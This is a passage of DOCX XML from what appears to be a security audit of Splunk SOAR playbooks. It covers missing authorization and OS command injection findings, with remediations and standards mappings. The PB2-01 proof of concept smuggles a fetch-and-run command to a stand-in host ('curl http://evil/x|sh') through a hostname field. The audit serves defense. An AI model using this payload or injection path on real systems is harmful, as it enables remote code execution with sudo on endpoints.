        <w:t>run admin command -&gt; {"data": "4", "command": "kill", ...}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: before any state change, (1) check the target against an allow/deny list (never disable accounts tagged </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>protected</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>break_glass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, never block domains on a corporate allow-list), and (2) require analyst approval for high-impact actions via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>prompt2</w:t>
      </w:r>
      <w:r>
        <w:t>, as the Search-and-Purge playbooks already do. Example gate:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>PROTECTED_USERS = {...}          # break-glass / service admins, loaded from a list asset</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>if user.lower() in PROTECTED_USERS:</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phantom.comment(container=container, comment=f"Refusing to disable protected account {user}")</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return</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>phantom.prompt2(container=container, user=container.get('owner_name'), message=f"Disable account {user}?", respond_in_mins=30, response_types=[{"prompt":"Disable?","options":{"type":"list","choices":["Yes","No"]}}], callback=do_disable)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-862 Missing Authorization (2024 CWE Top 25 #9); CWE-284 Improper Access Control; CWE-306 Missing Authentication for Critical Function (2024 CWE Top 25 #25). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A01:2021 Broken Access Control. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1531 Account Access Removal, T1489 Service Stop, T1498 Network Denial of Service. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AC-3 Access Enforcement, AC-6 Least Privilege, CM-5 Access Restrictions for Change, IR-4 Incident Handling. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.AA Protect - Identity Management, Authentication, and Access Control, PR.PS Protect - Platform Security, RS.MI Respond - Incident Mitigation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.5.15 Access control, A.8.2 Privileged access rights. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SOAR playbooks / Access Control.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PB2-01 — OS command injection via ip_or_hostname in SSH investigate playbooks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: High (CVSS v3.1 base 8.0). Exploitability: Exploitable (PoC executed).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks/internal_host_ssh_investigate.py:269-282,314-315; playbooks/internal_host_ssh_log4j_investigate.py:128-141,208-209</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>internal_host_ssh_investigate.py:269-282</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>run_bash_script</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>:314-315</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>get_output_zip_file</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>internal_host_ssh_log4j_investigate.py:128-141</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>run_bash_script</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>:208-209</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Code excerpt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>internal_host_ssh_investigate.py:280-282</w:t>
      </w:r>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t># pass the ip_hostname as an argument so it can be used in the output zip file name</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>for parameter in parameters:</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parameter['command'] = parameter['command'] + ' ' + parameter['ip_hostname']</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>:314-315</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>for parameter in parameters:</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parameter['file_path'] = '/tmp/' + parameter['file_path'] + '_ssh_output.zip'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: The playbook input </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ip_or_hostname</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is appended, unquoted, to the shell command string </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>bash /tmp/splunk_soar_internal_host_ssh_investigate.sh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and then dispatched via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>phantom.act("execute program", …, assets=["ssh"])</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The SSH app runs the string through a shell on the target host. If </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ip_or_hostname</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> contains shell metacharacters (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r>
        <w:t>, `</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> `</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>$()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">), arbitrary commands run on the endpoint with the SSH asset's privileges — which the </w:t>
      </w:r>
      <w:r>
        <w:t>.yml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> states require **sudo** (</w:t>
      </w:r>
      <w:r>
        <w:t>how_to_implement: The ssh asset requires sudo access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">). The same value also reaches the embedded bash script as </w:t>
      </w:r>
      <w:r>
        <w:t>$1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> (used in </w:t>
      </w:r>
      <w:r>
        <w:t>zip -j /tmp/$1_ssh_output.zip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> at </w:t>
      </w:r>
      <w:r>
        <w:t>:203</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">), a second unquoted injection point inside the script itself. **Untrusted-input reachability**: Source = </w:t>
      </w:r>
      <w:r>
        <w:t>playbook_input:ip_or_hostname</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">, which the parent </w:t>
      </w:r>
      <w:r>
        <w:t>log4j_investigate.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> populates from </w:t>
      </w:r>
      <w:r>
        <w:t>artifact:*.cef.deviceHostname</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:t>:233-237</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>:262-266</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">) — a CEF field whose value an attacker controls (e.g. a hostname harvested from a Splunk notable, an email header, or a custom list row read at </w:t>
      </w:r>
      <w:r>
        <w:t>log4j_investigate.py:63-76</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">). No validation/escaping between source and sink. Verdict: **Exploitable** (precondition: SSH asset configured with sudo, which is the documented deployment). **Proof of concept** (real output, </w:t>
      </w:r>
      <w:r>
        <w:t>python3 -I poc.py`):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>PoC 1: internal_host_ssh_investigate.run_bash_script (lines 269-282)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>command sent to SSH 'execute program':</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bash /tmp/splunk_soar_internal_host_ssh_investigate.sh server01; curl http://evil/x|sh #</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Payload hostname </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>server01; curl http://evil/x|sh #</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> yields a command string where everything after </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> executes as a second command with sudo on the endpoint. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (full replacement for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>run_bash_script</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> custom block):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>import shlex</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>for parameter in parameters:</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safe_host = parameter['ip_hostname']</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 ip_hostname is an SSH target, not shell input; pass it only as a quoted argv token</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parameter['command'] = 'bash /tmp/splunk_soar_internal_host_ssh_investigate.sh ' + shlex.quote(safe_host)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">and for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>get_output_zip_file</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>import os, re</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>for parameter in parameters:</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host = parameter['file_path']</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if not re.fullmatch(r'[A-Za-z0-9._-]{1,253}', host):</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phantom.error("Refusing unsafe hostname: {}".format(host)); phantom.discontinue(); return</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parameter['file_path'] = '/tmp/' + host + '_ssh_output.zip'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>shlex.quote</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ensures the hostname is a single argv token so metacharacters cannot start a new command; the allow-list regex blocks path/quote breakouts in the zip name. Functionality is preserved because legitimate hostnames/IPs match the allow-list.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-78 OS Command Injection (2024 CWE Top 25 #7). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A03:2021 Injection. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1059.004 Command and Scripting Interpreter: Unix Shell, T1203 Exploitation for Client Execution. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SI-10 Information Input Validation, AC-6 Least Privilege. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.28 Secure coding. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SOAR playbooks / Input Validation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PB2-02 — OS command injection via filepath in internal_host_ssh_log4j_respond</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: High (CVSS v3.1 base 8.0). Exploitability: Conditionally exploitable (locate branch ungated; delete branch prompt-gated).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks/internal_host_ssh_log4j_respond.py:59-64,140-150</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>:140-150</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>generate_deletion_commands</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Code excerpt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>:60</w:t>
      </w:r>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>script_str = f'''RESULT=""; for i in "{'" "'.join(v)}"; do if [ -f "$i" ]; then RESULT="${{RESULT}} true"; else RESULT="${{RESULT}} false"; fi; done; echo $RESULT'''</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>:145</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
